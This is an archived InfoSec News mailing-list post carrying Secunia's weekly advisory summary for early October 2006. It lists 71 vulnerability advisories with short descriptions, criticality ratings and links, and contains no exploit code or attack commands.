[ISN] Secunia Weekly Summary - Issue: 2006-40

From: InfoSec News (alerts@private)
Date: Thu Oct 05 2006 - 23:30:30 PDT


========================================================================

                  The Secunia Weekly Advisory Summary                  
                        2006-09-28 - 2006-10-05                        

                       This week: 71 advisories                        

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Weeks Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

Secunia Corporate Website has been Released

Learn more about what Secunia can offer you and your company, see and
download detailed product descriptions, and view comprehensive flash
presentations of both our products and corporate profile.

Visit the Secunia Corporate Website:
http://corporate.secunia.com/


Secunia Vulnerability and Advisory Portal has been Updated

Our publicly available Vulnerability and Advisory Portal
secunia.com has been updated with improved accessibility and usability,
enhanced features, and improved search capabilities along with
availability of extensive product reports.

Over the years, the Secunia brand has become synonymous with credible,
accurate, and reliable vulnerability intelligence and our services
are used by more than 5 million unique users every year at secunia.com.

Visit the Secunia Vulnerability and Advisory Portal:
http://secunia.com/

========================================================================
2) This Week in Brief:

Tom Ferris has reported a vulnerability in Skype for Mac, which
potentially can be exploited by malicious people to compromise a
user's system.

The vendor has released an updated version that corrects this
vulnerability.

References:
http://secunia.com/SA22185

 --
 
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.

Please refer to the referenced Secunia advisory for a comprehensive
listing of the issues corrected with this update.

References:
http://secunia.com/SA22187

 --

VIRUS ALERTS:

During the past week Secunia collected 196 virus descriptions from the
Antivirus vendors. However, none were deemed MEDIUM risk or higher
according to the Secunia assessment scale.

========================================================================
3) This Weeks Top Ten Most Read Advisories:

1.  [SA22159] Microsoft Windows Shell Code Execution Vulnerability
2.  [SA22127] Microsoft PowerPoint Code Execution Vulnerability
3.  [SA21910] Internet Explorer daxctle.ocx "KeyFrame()" Method
              Vulnerability
4.  [SA21906] Mozilla Firefox Multiple Vulnerabilities
5.  [SA21989] Microsoft Vector Graphics Rendering Library Buffer
              Overflow
6.  [SA22173] OpenSSH Signal Handling Vulnerability
7.  [SA22130] OpenSSL Multiple Vulnerabilities
8.  [SA20153] Microsoft Word Malformed Object Pointer Vulnerability
9.  [SA22187] Mac OS X Security Update Fixes Multiple Vulnerabilities
10. [SA22185] Skype URI Argument Handling Format String Vulnerability

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA22249] IBM Rational RequisitePro OpenSSL Vulnerability
[SA22232] OpenVPN Multiple Vulnerabilities
[SA22179] MailEnable Multiple Vulnerabilities
[SA22244] GroupWise Messenger Blowfish Zero-Sized Strings Denial of
Service
[SA22229] CA Unicenter Web Service Distributed Management Directory
Traversal
[SA22224] OfficeScan Corporate Edition "ATXCONSOLE.OCX" Format String
Vulnerability
[SA22222] McAfee ePolicy Orchestrator / ProtectionPilot Source Header
Buffer Overflow
[SA22234] Kerio Personal Firewall Hooked Functions Denial of Service

UNIX/Linux:
[SA22259] Mandriva update for ntp
[SA22245] Mandriva update for openssh
[SA22240] Debian update for openssl
[SA22236] FreeBSD update for openssh
[SA22220] rPath update for openssl
[SA22216] Kolab Server Multiple Vulnerabilities
[SA22212] Mandriva update for openssl
[SA22210] Ubuntu update for firefox
[SA22208] Ubuntu update for openssh
[SA22207] Slackware update for openssl
[SA22203] Mandriva update for gstreamer-ffmpeg
[SA22202] GStreamer FFmpeg Plug-in Multiple Buffer Overflows
[SA22201] Mandriva update for mplayer
[SA22200] Mandriva update for xine-lib
[SA22199] Gentoo update for dokuwiki
[SA22195] Gentoo update for mozilla-firefox
[SA22193] rPath update for openssl
[SA22191] Mandriva update for libmusicbrainz
[SA22190] HP-UX Ignite-UX Server Unspecified Vulnerability
[SA22187] Mac OS X Security Update Fixes Multiple Vulnerabilities
[SA22186] Red Hat update for openssl
[SA22185] Skype URI Argument Handling Format String Vulnerability
[SA22183] Red Hat update for openssh
[SA22181] xine-lib FFmpeg Multiple Buffer Overflow Vulnerabilities
[SA22180] FFmpeg Multiple Buffer Overflow Vulnerabilities
[SA22260] Mandriva update for MySQL
[SA22239] Debian update for cscope
[SA22227] Debian update for mailman
[SA22226] Sun Solaris RSA Signature Forgery Vulnerability
[SA22219] rPath update for openldap
[SA22205] Ubuntu update for gdb
[SA22243] Debian update for migrationtools
[SA22223] IBM Informix Dynamic Server Insecure Temporary File Creation
[SA22213] IBM AIX acctctl Privilege Escalation Vulnerability

Other:


Cross Platform:
[SA22261] Drupal IMCE Module Multiple Vulnerabilities
[SA22256] Minerva "phpbb_root_path" File Inclusion Vulnerability
[SA22242] HAMweather "do_parse_code" Command Injection Vulnerability
[SA22231] BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities
[SA22214] Forum82 "repertorylevel" File Inclusion Vulnerabilities
[SA22209] PowerPortal "file_name[]" File Inclusion Vulnerability
[SA22198] Mandriva update for ffmpeg
[SA22196] Red Hat update for openssh
[SA22194] Travelsized CMS "setup_folder" File Inclusion Vulnerability
[SA22192] DokuWiki Denial of Service and Command Injection
[SA22184] VideoDB "config[pdf_module]" File Inclusion Vulnerability
[SA22182] MPlayer FFmpeg Multiple Buffer Overflow Vulnerabilities
[SA22178] phpMyWebmin File Inclusions and Information Disclosure
[SA22177] phpBB XS "phpbb_root_path" File Inclusion Vulnerability
[SA22262] IBM WebSphere Application Server Apache mod_rewrite
Vulnerability
[SA22257] Taskjitsu "key" SQL Injection Vulnerability
[SA22241] OlateDownload Script Insertion and SQL Injection
[SA22238] OpenBiblio Local File Inclusion and SQL Injection
[SA22206] Intoto iGateway VPN / SSL-VPN Denial of Service
Vulnerability
[SA22176] DeluxeBB "templatefolder" File Inclusion Vulnerability
[SA22255] net2ftp "username" Cross-Site Scripting Vulnerability
[SA22248] TeraStation HD-HTGL Series Cross-Site Request Forgery
[SA22215] Mercury SiteScope Multiple Script Insertion Vulnerabilities
[SA22211] WWWthreads "Cat" Cross-Site Scripting Vulnerabilities
[SA22204] Sun Java JDK / SDK RSA Signature Forgery Vulnerability
[SA22197] PostNuke "hits" SQL Injection Vulnerability
[SA22188] phpBB "avatar_path" PHP Code Execution Vulnerability
[SA22235] PHP "open_basedir" Symlink Security Bypass Vulnerability

========================================================================
5) Vulnerabilities Content Listing

Windows:--

[SA22249] IBM Rational RequisitePro OpenSSL Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-04

IBM has acknowledged a vulnerability in Rational RequisitePro
RequisiteWeb, which can be exploited by malicious people to cause a DoS
(Denial of Service) or to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22249/

 --

[SA22232] OpenVPN Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Some vulnerabilities have been reported in OpenVPN, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22232/

 --

[SA22179] MailEnable Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Some vulnerabilities have been reported in MailEnable, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22179/

 --

[SA22244] GroupWise Messenger Blowfish Zero-Sized Strings Denial of
Service

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-10-03

A vulnerability has been reported in GroupWise Messenger, which can be
exploited by malicious people to cause a DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/22244/

 --

[SA22229] CA Unicenter Web Service Distributed Management Directory
Traversal

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, Exposure of sensitive
information
Released:    2006-10-04

A vulnerability has been reported in CA Unicenter Web Services
Distributed Management (WSDM), which can be exploited by malicious
people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/22229/

 --

[SA22224] OfficeScan Corporate Edition "ATXCONSOLE.OCX" Format String
Vulnerability

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2006-10-02

A vulnerability has been reported in Trend Micro OfficeScan Corporate
Edition, which can be exploited by malicious people to potentially
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/22224/

 --

[SA22222] McAfee ePolicy Orchestrator / ProtectionPilot Source Header
Buffer Overflow

Critical:    Moderately critical
Where:       From local network
Impact:      System access
Released:    2006-10-02

A vulnerability has been reported in McAfee ProtectionPilot and McAfee
ePolicy Orchestrator, which can be exploited by malicious people to
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22222/

 --

[SA22234] Kerio Personal Firewall Hooked Functions Denial of Service

Critical:    Not critical
Where:       Local system
Impact:      DoS
Released:    2006-10-02

David Matousek has reported some vulnerabilities in Kerio Personal
Firewall, which can be exploited by malicious, local users to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/22234/


UNIX/Linux:--

[SA22259] Mandriva update for ntp

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Mandriva has issued an update for ntp. This fixes some vulnerabilities,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22259/

 --

[SA22245] Mandriva update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-04

Mandriva has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22245/

 --

[SA22240] Debian update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Debian has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22240/

 --

[SA22236] FreeBSD update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      System access, DoS
Released:    2006-10-02

FreeBSD has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22236/

 --

[SA22220] rPath update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

rPath has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22220/

 --

[SA22216] Kolab Server Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-04

Some vulnerabilities have been reported in Kolab Server, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22216/

 --

[SA22212] Mandriva update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Mandriva has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22212/

 --

[SA22210] Ubuntu update for firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, DoS,
System access
Released:    2006-10-04

Ubuntu has issued an update for firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
man-in-the-middle, spoofing, and cross-site scripting attacks, and
compromise a user's system.

Full Advisory:
http://secunia.com/advisories/22210/

 --

[SA22208] Ubuntu update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Ubuntu has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22208/

 --

[SA22207] Slackware update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Slackware has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22207/

 --

[SA22203] Mandriva update for gstreamer-ffmpeg

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for gstreamer-ffmpeg. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22203/

 --

[SA22202] GStreamer FFmpeg Plug-in Multiple Buffer Overflows

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in GStreamer FFmpeg Plug-in,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22202/

 --

[SA22201] Mandriva update for mplayer

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for mplayer. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22201/

 --

[SA22200] Mandriva update for xine-lib

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for xine-lib. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22200/

 --

[SA22199] Gentoo update for dokuwiki

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Gentoo has issued an update for dokuwiki. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22199/

 --

[SA22195] Gentoo update for mozilla-firefox

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Cross Site Scripting, Spoofing, DoS,
System access
Released:    2006-09-29

Gentoo has issued an update for mozilla-firefox. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service), conduct man-in-the-middle, spoofing, and
cross-site scripting attacks, and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22195/

 --

[SA22193] rPath update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

rPath has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22193/

 --

[SA22191] Mandriva update for libmusicbrainz

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for libmusicbrainz. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22191/

 --

[SA22190] HP-UX Ignite-UX Server Unspecified Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

A vulnerability has been reported in HP-UX, which can be exploited by
malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22190/

 --

[SA22187] Mac OS X Security Update Fixes Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Spoofing, Exposure of sensitive
information, Privilege escalation, DoS, System access
Released:    2006-09-29

Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.

Full Advisory:
http://secunia.com/advisories/22187/

 --

[SA22186] Red Hat update for openssl

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Red Hat has issued an update for openssl. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22186/

 --

[SA22185] Skype URI Argument Handling Format String Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

Tom Ferris has reported a vulnerability in Skype for Mac, which
potentially can be exploited by malicious people to compromise a user's
system.

Full Advisory:
http://secunia.com/advisories/22185/

 --

[SA22183] Red Hat update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Red Hat has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22183/

 --

[SA22181] xine-lib FFmpeg Multiple Buffer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in xine-lib, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22181/

 --

[SA22180] FFmpeg Multiple Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in FFmpeg, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22180/

 --

[SA22260] Mandriva update for MySQL

Critical:    Moderately critical
Where:       From local network
Impact:      DoS, System access
Released:    2006-10-03

Mandriva has issued an update for MySQL. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22260/

 --

[SA22239] Debian update for cscope

Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-02

Debian has issued an update for cscope. This fixes some
vulnerabilities, which potentially can be exploited by malicious people
to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22239/

 --

[SA22227] Debian update for mailman

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Spoofing
Released:    2006-10-04

Debian has issued an update for mailman. This fixes some
vulnerabilities, which can be exploited by malicious people to conduct
cross-site scripting and phishing attacks.

Full Advisory:
http://secunia.com/advisories/22227/

 --

[SA22226] Sun Solaris RSA Signature Forgery Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-10-04

Sun has acknowledged a vulnerability in various products included in
Solaris, which potentially can be exploited by malicious people to
bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/22226/

 --

[SA22219] rPath update for openldap

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-10-02

rPath has issued an update for openldap. This fixes a security issue,
which can be exploited by malicious users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/22219/

 --

[SA22205] Ubuntu update for gdb

Critical:    Less critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

Ubuntu has issued an update for gdb. This fixes some vulnerabilities,
which can be exploited by malicious, local users to gain escalated
privileges or malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22205/

 --

[SA22243] Debian update for migrationtools

Critical:    Less critical
Where:       Local system
Impact:      Exposure of sensitive information
Released:    2006-10-02

Debian has issued an update for migrationtools. This fixes  a
vulnerability, which can be exploited by malicious, local users to
disclose potentially sensitive information and perform certain actions
with escalated privileges on a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22243/

 --

[SA22223] IBM Informix Dynamic Server Insecure Temporary File Creation

Critical:    Less critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-10-03

Larry Cashdollar has discovered a vulnerability in IBM Informix Dynamic
Server, which can be exploited by malicious, local users to perform
certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/22223/

 --

[SA22213] IBM AIX acctctl Privilege Escalation Vulnerability

Critical:    Not critical
Where:       Local system
Impact:      Privilege escalation
Released:    2006-10-02

A vulnerability has been reported in IBM AIX, which can be exploited by
malicious, local users to gain escalated privileges.

Full Advisory:
http://secunia.com/advisories/22213/


Other:


Cross Platform:--

[SA22261] Drupal IMCE Module Multiple Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      Manipulation of data, System access
Released:    2006-10-03

Some vulnerabilities have been reported in the IMCE Module for Drupal,
which can be exploited by malicious users to delete files or compromise
a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22261/

 --

[SA22256] Minerva "phpbb_root_path" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

SHiKaA has reported a vulnerability in Minerva, which can be exploited
by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22256/

 --

[SA22242] HAMweather "do_parse_code" Command Injection Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-03

Some vulnerabilities have been reported in HAMweather, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22242/

 --

[SA22231] BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

Kacper has reported some vulnerabilities in BasiliX, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22231/

 --

[SA22214] Forum82 "repertorylevel" File Inclusion Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

Silahsiz Kuvvetler has discovered some vulnerabilities in Forum82,
which can be exploited by malicious people to compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22214/

 --

[SA22209] PowerPortal "file_name[]" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

v1per-haCker has discovered a vulnerability in PowerPortal, which can
be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22209/

 --

[SA22198] Mandriva update for ffmpeg

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Mandriva has issued an update for ffmpeg. This fixes some
vulnerabilities, which can be exploited by malicious people to cause a
DoS (Denial of Service) and potentially compromise a vulnerable
system.

Full Advisory:
http://secunia.com/advisories/22198/

 --

[SA22196] Red Hat update for openssh

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Privilege escalation, DoS, System access
Released:    2006-09-29

Red Hat has issued an update for openssh. This fixes some
vulnerabilities, which can be exploited by malicious, local users to
perform certain actions with escalated privileges, and by malicious
people to bypass certain security restrictions, cause a DoS (Denial of
Service), and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22196/

 --

[SA22194] Travelsized CMS "setup_folder" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-04

Kacper has discovered a vulnerability in Travelsized CMS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22194/

 --

[SA22192] DokuWiki Denial of Service and Command Injection

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in DokuWiki, which can be
exploited by malicious people to cause a DoS (Denial of Service) or
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22192/

 --

[SA22184] VideoDB "config[pdf_module]" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-10-02

Kacper has discovered a vulnerability in VideoDB, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22184/

 --

[SA22182] MPlayer FFmpeg Multiple Buffer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-09-29

Some vulnerabilities have been reported in MPlayer, which can be
exploited by malicious people to cause a DoS (Denial of Service) and
potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22182/

 --

[SA22178] phpMyWebmin File Inclusions and Information Disclosure

Critical:    Highly critical
Where:       From remote
Impact:      Exposure of system information, System access
Released:    2006-09-29

Some vulnerabilities and two weaknesses have been discovered in
phpMyWebmin, which can be exploited by malicious people to disclose
system information and compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22178/

 --

[SA22177] phpBB XS "phpbb_root_path" File Inclusion Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2006-09-29

Solpot has discovered a vulnerability in phpBB XS, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22177/

 --

[SA22262] IBM WebSphere Application Server Apache mod_rewrite
Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS, System access
Released:    2006-10-03

IBM has acknowledged a vulnerability in WebSphere Application Server,
which potentially can be exploited by malicious people to compromise a
vulnerable system.

Full Advisory:
http://secunia.com/advisories/22262/

 --

[SA22257] Taskjitsu "key" SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-10-04

A vulnerability has been reported in Taskjitsu, which can be exploited
by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/22257/

 --

[SA22241] OlateDownload Script Insertion and SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-10-02

Hessam-x has reported some vulnerabilities in OlateDownload, which can
be exploited by malicious people to conduct script insertion and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/22241/

 --

[SA22238] OpenBiblio Local File Inclusion and SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data, Exposure of sensitive information
Released:    2006-10-02

Some vulnerabilities have been reported in OpenBiblio, which can be
exploited by malicious people to disclose potentially sensitive
information, and by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/22238/

 --

[SA22206] Intoto iGateway VPN / SSL-VPN Denial of Service
Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      DoS
Released:    2006-10-02

A vulnerability has been reported in Intoto iGateway VPN and Intoto
iGateway SSL-VPN, which can be exploited by malicious people to cause a
DoS (Denial of Service).

Full Advisory:
http://secunia.com/advisories/22206/

 --

[SA22176] DeluxeBB "templatefolder" File Inclusion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-10-02

r0ut3r has reported a vulnerability in DeluxeBB, which can be exploited
by malicious people to disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/22176/

 --

[SA22255] net2ftp "username" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-10-03

securfrog has discovered a vulnerability in net2ftp, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/22255/

 --

[SA22248] TeraStation HD-HTGL Series Cross-Site Request Forgery

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-10-03

A vulnerability has been reported in TeraStation HD-HTGL Series, which
can be exploited by malicious people to conduct cross-site request
forgery attacks.

Full Advisory:
http://secunia.com/advisories/22248/

 --

[SA22215] Mercury SiteScope Multiple Script Insertion Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-10-03

Ozkan Aziz has reported some vulnerabilities in Mercury SiteScope,
which can be exploited by malicious users to conduct script insertion
attacks.

Full Advisory:
http://secunia.com/advisories/22215/

 --

[SA22211] WWWthreads "Cat" Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-10-02

Root3r_H3ll has reported some vulnerabilities in WWWthreads, which can
be exploited by malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/22211/

 --

[SA22204] Sun Java JDK / SDK RSA Signature Forgery Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Security Bypass
Released:    2006-10-04

Sun has acknowledged a vulnerability in Sun JDK / SDK, which
potentially can be exploited by malicious people to bypass certain
security restrictions.

Full Advisory:
http://secunia.com/advisories/22204/

 --

[SA22197] PostNuke "hits" SQL Injection Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-10-03

Omid has discovered a vulnerability in PostNuke, which can be exploited
by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/22197/

 --

[SA22188] phpBB "avatar_path" PHP Code Execution Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2006-10-04

ShAnKaR has discovered a vulnerability in phpBB, which can be exploited
by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22188/

 --

[SA22235] PHP "open_basedir" Symlink Security Bypass Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass
Released:    2006-10-04

Stefan Esser has reported a vulnerability in PHP, which can be
exploited by malicious, local users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/22235/



========================================================================

Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web	: http://secunia.com/
E-mail	: support@private
Tel	: +45 70 20 51 44
Fax	: +45 70 20 51 45


_________________________________
Donate online for the Ron Santo Walk to Cure Diabetes!
http://www.c4i.org/ethan.html



This archive was generated by hypermail 2.1.3 : Thu Oct 05 2006 - 23:42:58 PDT